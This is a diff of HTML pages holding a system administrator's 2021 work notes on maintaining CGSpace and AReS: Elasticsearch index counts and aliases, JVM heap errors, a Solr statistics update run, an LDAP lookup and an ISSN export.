                                                                                                                                                                                • The harvesting on AReS yesterday completed, but somehow I have twice the number of items:
                                                                                                                                                                                -
                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                -{
                                                                                                                                                                                -  "count" : 206204,
                                                                                                                                                                                -  "_shards" : {
                                                                                                                                                                                -    "total" : 1,
                                                                                                                                                                                -    "successful" : 1,
                                                                                                                                                                                -    "skipped" : 0,
                                                                                                                                                                                -    "failed" : 0
                                                                                                                                                                                -  }
                                                                                                                                                                                -}
                                                                                                                                                                                -
                                                                                                                                                                                  +
                                                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                  +{
                                                                                                                                                                                  +  "count" : 206204,
                                                                                                                                                                                  +  "_shards" : {
                                                                                                                                                                                  +    "total" : 1,
                                                                                                                                                                                  +    "successful" : 1,
                                                                                                                                                                                  +    "skipped" : 0,
                                                                                                                                                                                  +    "failed" : 0
                                                                                                                                                                                  +  }
                                                                                                                                                                                  +}
                                                                                                                                                                                  +
                                                                                                                                                                                  • Hmmm and even my backup index has a strange number of items:
                                                                                                                                                                                  -
                                                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&pretty'
                                                                                                                                                                                  -{
                                                                                                                                                                                  -  "count" : 844,
                                                                                                                                                                                  -  "_shards" : {
                                                                                                                                                                                  -    "total" : 1,
                                                                                                                                                                                  -    "successful" : 1,
                                                                                                                                                                                  -    "skipped" : 0,
                                                                                                                                                                                  -    "failed" : 0
                                                                                                                                                                                  -  }
                                                                                                                                                                                  -}
                                                                                                                                                                                  -
                                                                                                                                                                                    +
                                                                                                                                                                                    $ curl -s 'http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&pretty'
                                                                                                                                                                                    +{
                                                                                                                                                                                    +  "count" : 844,
                                                                                                                                                                                    +  "_shards" : {
                                                                                                                                                                                    +    "total" : 1,
                                                                                                                                                                                    +    "successful" : 1,
                                                                                                                                                                                    +    "skipped" : 0,
                                                                                                                                                                                    +    "failed" : 0
                                                                                                                                                                                    +  }
                                                                                                                                                                                    +}
                                                                                                                                                                                    +
                                                                                                                                                                                    • I deleted all indexes and re-created the openrxv-items alias:
                                                                                                                                                                                    -
                                                                                                                                                                                    $ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                    -$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                    -...
                                                                                                                                                                                    -    "openrxv-items-temp": {
                                                                                                                                                                                    -        "aliases": {}
                                                                                                                                                                                    -    },
                                                                                                                                                                                    -    "openrxv-items-final": {
                                                                                                                                                                                    -        "aliases": {
                                                                                                                                                                                    -            "openrxv-items": {}
                                                                                                                                                                                    -        }
                                                                                                                                                                                    -    }
                                                                                                                                                                                    -
                                                                                                                                                                                      +
                                                                                                                                                                                      $ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                      +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                      +...
                                                                                                                                                                                      +    "openrxv-items-temp": {
                                                                                                                                                                                      +        "aliases": {}
                                                                                                                                                                                      +    },
                                                                                                                                                                                      +    "openrxv-items-final": {
                                                                                                                                                                                      +        "aliases": {
                                                                                                                                                                                      +            "openrxv-items": {}
                                                                                                                                                                                      +        }
                                                                                                                                                                                      +    }
                                                                                                                                                                                      +
                                                                                                                                                                                      • Then I started a new harvesting
                                                                                                                                                                                      • I switched the Node.js in the Ansible infrastructure scripts to v12 since v10 will cease to be supported soon
                                                                                                                                                                                          @@ -591,26 +591,26 @@ $ curl -s 'http://localhost:9200/_alias/'
                                                                                                                                                                                        • The AReS harvest finally finished, with 1047 pages of items, but the openrxv-items-final index is empty and the openrxv-items-temp index has a 103,000 items:
                                                                                                                                                                                        -
                                                                                                                                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                        -{
                                                                                                                                                                                        -  "count" : 103162,
                                                                                                                                                                                        -  "_shards" : {
                                                                                                                                                                                        -    "total" : 1,
                                                                                                                                                                                        -    "successful" : 1,
                                                                                                                                                                                        -    "skipped" : 0,
                                                                                                                                                                                        -    "failed" : 0
                                                                                                                                                                                        -  }
                                                                                                                                                                                        -}
                                                                                                                                                                                        -
                                                                                                                                                                                          +
                                                                                                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                          +{
                                                                                                                                                                                          +  "count" : 103162,
                                                                                                                                                                                          +  "_shards" : {
                                                                                                                                                                                          +    "total" : 1,
                                                                                                                                                                                          +    "successful" : 1,
                                                                                                                                                                                          +    "skipped" : 0,
                                                                                                                                                                                          +    "failed" : 0
                                                                                                                                                                                          +  }
                                                                                                                                                                                          +}
                                                                                                                                                                                          +
                                                                                                                                                                                          • I tried to clone the temp index to the final, but got an error:
                                                                                                                                                                                          -
                                                                                                                                                                                          $ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                                                                                                                                                                                          -{"error":{"root_cause":[{"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"}],"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"},"status":400}% 
                                                                                                                                                                                          -
                                                                                                                                                                                            +
                                                                                                                                                                                            $ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                                                                                                                                                                                            +{"error":{"root_cause":[{"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"}],"type":"resource_already_exists_exception","reason":"index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists","index_uuid":"LmxH-rQsTRmTyWex2d8jxw","index":"openrxv-items-final"},"status":400}% 
                                                                                                                                                                                            +
                                                                                                                                                                                            • I looked in the Docker logs for Elasticsearch and saw a few memory errors:
                                                                                                                                                                                            -
                                                                                                                                                                                            java.lang.OutOfMemoryError: Java heap space
                                                                                                                                                                                            -
                                                                                                                                                                                              +
                                                                                                                                                                                              java.lang.OutOfMemoryError: Java heap space
                                                                                                                                                                                              +
                                                                                                                                                                                              • According to /usr/share/elasticsearch/config/jvm.options in the Elasticsearch container the default JVM heap is 1g
                                                                                                                                                                                                • I see the running Java process has -Xms 1g -Xmx 1g in its process invocation so I guess that it must be indeed using 1g
                                                                                                                                                                                                • @@ -622,20 +622,20 @@ $ curl -s 'http://localhost:9200/_alias/'
                                                                                                                                                                                                -
                                                                                                                                                                                                    "openrxv-items-final": {
                                                                                                                                                                                                -        "aliases": {}
                                                                                                                                                                                                -    },
                                                                                                                                                                                                -    "openrxv-items-temp": {
                                                                                                                                                                                                -        "aliases": {
                                                                                                                                                                                                -            "openrxv-items": {}
                                                                                                                                                                                                -        }
                                                                                                                                                                                                -    },
                                                                                                                                                                                                -

                                                                                                                                                                                                2021-03-23

                                                                                                                                                                                                +
                                                                                                                                                                                                    "openrxv-items-final": {
                                                                                                                                                                                                +        "aliases": {}
                                                                                                                                                                                                +    },
                                                                                                                                                                                                +    "openrxv-items-temp": {
                                                                                                                                                                                                +        "aliases": {
                                                                                                                                                                                                +            "openrxv-items": {}
                                                                                                                                                                                                +        }
                                                                                                                                                                                                +    },
                                                                                                                                                                                                +

                                                                                                                                                                                                2021-03-23

                                                                                                                                                                                                • For reference you can also get the Elasticsearch JVM stats from the API:
                                                                                                                                                                                                -
                                                                                                                                                                                                $ curl -s 'http://localhost:9200/_nodes/jvm?human' | python -m json.tool
                                                                                                                                                                                                -
                                                                                                                                                                                                  +
                                                                                                                                                                                                  $ curl -s 'http://localhost:9200/_nodes/jvm?human' | python -m json.tool
                                                                                                                                                                                                  +
                                                                                                                                                                                                  • I re-deployed AReS with 1.5GB of heap using the ES_JAVA_OPTS environment variable -
                                                                                                                                                                                                    $ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                    -

                                                                                                                                                                                                    2021-03-24

                                                                                                                                                                                                    +
                                                                                                                                                                                                    $ curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                    +

                                                                                                                                                                                                    2021-03-24

                                                                                                                                                                                                    • Atmire responded to the ticket about the Duplicate Checker
                                                                                                                                                                                                        @@ -659,105 +659,105 @@ $ curl -s 'http://localhost:9200/_alias/'
                                                                                                                                                                                                      -
                                                                                                                                                                                                      # du -s /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                      -57861236        /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                      -
                                                                                                                                                                                                        +
                                                                                                                                                                                                        # du -s /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                        +57861236        /home/dspacetest.cgiar.org/solr/statistics
                                                                                                                                                                                                        +
                                                                                                                                                                                                        • I applied their changes to config/spring/api/atmire-cua-update.xml and started the duplicate processor:
                                                                                                                                                                                                        -
                                                                                                                                                                                                        $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                        -$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 1000 -c statistics -t 12
                                                                                                                                                                                                        -
                                                                                                                                                                                                          +
                                                                                                                                                                                                          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                          +$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 1000 -c statistics -t 12
                                                                                                                                                                                                          +
                                                                                                                                                                                                          • The default number of records per query is 10,000, which caused memory issues, so I will try with 1000 (Atmire used 100, but that seems too low!)
                                                                                                                                                                                                          • Hah, I still got a memory error after only a few minutes:
                                                                                                                                                                                                          -
                                                                                                                                                                                                          ...
                                                                                                                                                                                                          -Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s                                      
                                                                                                                                                                                                          -Exception: GC overhead limit exceeded                                                                          
                                                                                                                                                                                                          -java.lang.OutOfMemoryError: GC overhead limit exceeded 
                                                                                                                                                                                                          -
                                                                                                                                                                                                            +
                                                                                                                                                                                                            ...
                                                                                                                                                                                                            +Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s                                      
                                                                                                                                                                                                            +Exception: GC overhead limit exceeded                                                                          
                                                                                                                                                                                                            +java.lang.OutOfMemoryError: GC overhead limit exceeded 
                                                                                                                                                                                                            +
                                                                                                                                                                                                            • I guess we really do have to use -r 100
                                                                                                                                                                                                            • Now the thing runs for a few minutes and “finishes”:
                                                                                                                                                                                                            -
                                                                                                                                                                                                            $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12
                                                                                                                                                                                                            -Loading @mire database changes for module MQM
                                                                                                                                                                                                            -Changes have been processed
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -*************************
                                                                                                                                                                                                            -* Update Script Started *
                                                                                                                                                                                                            -*************************
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -Run 1
                                                                                                                                                                                                            -Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                            -Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                            -Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                            -Done. | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                            -Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                            -Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
                                                                                                                                                                                                            -Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
                                                                                                                                                                                                            -Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
                                                                                                                                                                                                            -Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
                                                                                                                                                                                                            -Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
                                                                                                                                                                                                            -Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
                                                                                                                                                                                                            -Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
                                                                                                                                                                                                            -Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
                                                                                                                                                                                                            -Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
                                                                                                                                                                                                            -Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
                                                                                                                                                                                                            -Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
                                                                                                                                                                                                            -Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
                                                                                                                                                                                                            -Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
                                                                                                                                                                                                            -Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
                                                                                                                                                                                                            -Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
                                                                                                                                                                                                            -Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
                                                                                                                                                                                                            -Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
                                                                                                                                                                                                            -Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
                                                                                                                                                                                                            -Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
                                                                                                                                                                                                            -Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
                                                                                                                                                                                                            -Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
                                                                                                                                                                                                            -Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
                                                                                                                                                                                                            -Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
                                                                                                                                                                                                            -Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
                                                                                                                                                                                                            -Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
                                                                                                                                                                                                            -Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
                                                                                                                                                                                                            -Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
                                                                                                                                                                                                            -Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
                                                                                                                                                                                                            -Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
                                                                                                                                                                                                            -Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
                                                                                                                                                                                                            -Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
                                                                                                                                                                                                            -Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
                                                                                                                                                                                                            -Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
                                                                                                                                                                                                            -Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
                                                                                                                                                                                                            -Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
                                                                                                                                                                                                            -Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
                                                                                                                                                                                                            -Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
                                                                                                                                                                                                            -Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
                                                                                                                                                                                                            -Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
                                                                                                                                                                                                            -Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
                                                                                                                                                                                                            -Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
                                                                                                                                                                                                            -Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
                                                                                                                                                                                                            -Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
                                                                                                                                                                                                            -Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
                                                                                                                                                                                                            -Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
                                                                                                                                                                                                            -Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
                                                                                                                                                                                                            -Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
                                                                                                                                                                                                            -Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
                                                                                                                                                                                                            -Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
                                                                                                                                                                                                            -Run 1 took 5m 53s
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -
                                                                                                                                                                                                            -**************************
                                                                                                                                                                                                            -* Update Script Finished *
                                                                                                                                                                                                            -**************************
                                                                                                                                                                                                            -
                                                                                                                                                                                                              +
                                                                                                                                                                                                              $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12
                                                                                                                                                                                                              +Loading @mire database changes for module MQM
                                                                                                                                                                                                              +Changes have been processed
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +*************************
                                                                                                                                                                                                              +* Update Script Started *
                                                                                                                                                                                                              +*************************
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +Run 1
                                                                                                                                                                                                              +Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                              +Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                              +Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
                                                                                                                                                                                                              +Done. | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                              +Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
                                                                                                                                                                                                              +Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
                                                                                                                                                                                                              +Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
                                                                                                                                                                                                              +Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
                                                                                                                                                                                                              +Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
                                                                                                                                                                                                              +Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
                                                                                                                                                                                                              +Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
                                                                                                                                                                                                              +Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
                                                                                                                                                                                                              +Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
                                                                                                                                                                                                              +Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
                                                                                                                                                                                                              +Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
                                                                                                                                                                                                              +Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
                                                                                                                                                                                                              +Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
                                                                                                                                                                                                              +Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
                                                                                                                                                                                                              +Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
                                                                                                                                                                                                              +Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
                                                                                                                                                                                                              +Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
                                                                                                                                                                                                              +Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
                                                                                                                                                                                                              +Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
                                                                                                                                                                                                              +Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
                                                                                                                                                                                                              +Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
                                                                                                                                                                                                              +Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
                                                                                                                                                                                                              +Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
                                                                                                                                                                                                              +Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
                                                                                                                                                                                                              +Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
                                                                                                                                                                                                              +Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
                                                                                                                                                                                                              +Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
                                                                                                                                                                                                              +Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
                                                                                                                                                                                                              +Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
                                                                                                                                                                                                              +Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
                                                                                                                                                                                                              +Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
                                                                                                                                                                                                              +Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
                                                                                                                                                                                                              +Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
                                                                                                                                                                                                              +Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
                                                                                                                                                                                                              +Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
                                                                                                                                                                                                              +Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
                                                                                                                                                                                                              +Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
                                                                                                                                                                                                              +Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
                                                                                                                                                                                                              +Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
                                                                                                                                                                                                              +Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
                                                                                                                                                                                                              +Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
                                                                                                                                                                                                              +Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
                                                                                                                                                                                                              +Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
                                                                                                                                                                                                              +Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
                                                                                                                                                                                                              +Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
                                                                                                                                                                                                              +Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
                                                                                                                                                                                                              +Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
                                                                                                                                                                                                              +Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
                                                                                                                                                                                                              +Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
                                                                                                                                                                                                              +Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
                                                                                                                                                                                                              +Run 1 took 5m 53s
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +
                                                                                                                                                                                                              +**************************
                                                                                                                                                                                                              +* Update Script Finished *
                                                                                                                                                                                                              +**************************
                                                                                                                                                                                                              +
                                                                                                                                                                                                              -
                                                                                                                                                                                                              2021-03-29 08:55:40,073 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&fl=handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&wt=javabin&version=2} hits=143 status=0 QTime=0
                                                                                                                                                                                                              -
                                                                                                                                                                                                                +
                                                                                                                                                                                                                2021-03-29 08:55:40,073 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&fl=handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&wt=javabin&version=2} hits=143 status=0 QTime=0
                                                                                                                                                                                                                +
                                                                                                                                                                                                                • But the item mapper only displays ten items, with no pagination
                                                                                                                                                                                                                  • There is no way to search by handle or ID
                                                                                                                                                                                                                  • @@ -836,18 +836,18 @@ Run 1 took 5m 53s
                                                                                                                                                                                                                -
                                                                                                                                                                                                                import requests
                                                                                                                                                                                                                -
                                                                                                                                                                                                                -query_params = {'item-type': 'publication', 'format': 'Json', 'limit': 10, 'offset': 0, 'api-key': 'blahhhahahah', 'filter': '[["issn","equals","0011-183X"]]'}
                                                                                                                                                                                                                -r = requests.get('https://v2.sherpa.ac.uk/cgi/retrieve')
                                                                                                                                                                                                                -if r.status_code and len(r.json()['items']) > 0:
                                                                                                                                                                                                                -    r.json()['items'][0]['title'][0]['title']
                                                                                                                                                                                                                -
                                                                                                                                                                                                                  +
                                                                                                                                                                                                                  import requests
                                                                                                                                                                                                                  +
                                                                                                                                                                                                                  +query_params = {'item-type': 'publication', 'format': 'Json', 'limit': 10, 'offset': 0, 'api-key': 'blahhhahahah', 'filter': '[["issn","equals","0011-183X"]]'}
                                                                                                                                                                                                                  +r = requests.get('https://v2.sherpa.ac.uk/cgi/retrieve')
                                                                                                                                                                                                                  +if r.status_code and len(r.json()['items']) > 0:
                                                                                                                                                                                                                  +    r.json()['items'][0]['title'][0]['title']
                                                                                                                                                                                                                  +
                                                                                                                                                                                                                  • I exported a list of all our ISSNs from CGSpace:
                                                                                                                                                                                                                  -
                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
                                                                                                                                                                                                                  -COPY 3081
                                                                                                                                                                                                                  -
                                                                                                                                                                                                                    +
                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
                                                                                                                                                                                                                    +COPY 3081
                                                                                                                                                                                                                    +
                                                                                                                                                                                                                    • I wrote a script to check the ISSNs against Crossref’s API: crossref-issn-lookup.py
                                                                                                                                                                                                                      • I suspect Crossref might have better data actually…
                                                                                                                                                                                                                      • diff --git a/docs/2021-04/index.html b/docs/2021-04/index.html index 1c94c886c..a1ee7c1f8 100644 --- a/docs/2021-04/index.html +++ b/docs/2021-04/index.html @@ -44,7 +44,7 @@ Perhaps one of the containers crashed, I should have looked closer but I was in "/> - + @@ -153,21 +153,21 @@ Perhaps one of the containers crashed, I should have looked closer but I was in
                                                                                                                                                                                                                    -
                                                                                                                                                                                                                    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-account" -W "(sAMAccountName=otheraccounttoquery)"
                                                                                                                                                                                                                    -

                                                                                                                                                                                                                    2021-04-04

                                                                                                                                                                                                                    +
                                                                                                                                                                                                                    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-account" -W "(sAMAccountName=otheraccounttoquery)"
                                                                                                                                                                                                                    +

                                                                                                                                                                                                                    2021-04-04

                                                                                                                                                                                                                    • Check the index aliases on AReS Explorer to make sure they are sane before starting a new harvest:
                                                                                                                                                                                                                    -
                                                                                                                                                                                                                    $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                                                    -
                                                                                                                                                                                                                      +
                                                                                                                                                                                                                      $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                                                                                      +
                                                                                                                                                                                                                      • Then set the openrxv-items-final index to read-only so we can make a backup:
                                                                                                                                                                                                                      -
                                                                                                                                                                                                                      $ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}' 
                                                                                                                                                                                                                      -{"acknowledged":true}%
                                                                                                                                                                                                                      -$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-backup
                                                                                                                                                                                                                      -{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final-backup"}%
                                                                                                                                                                                                                      -$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                      -
                                                                                                                                                                                                                        +
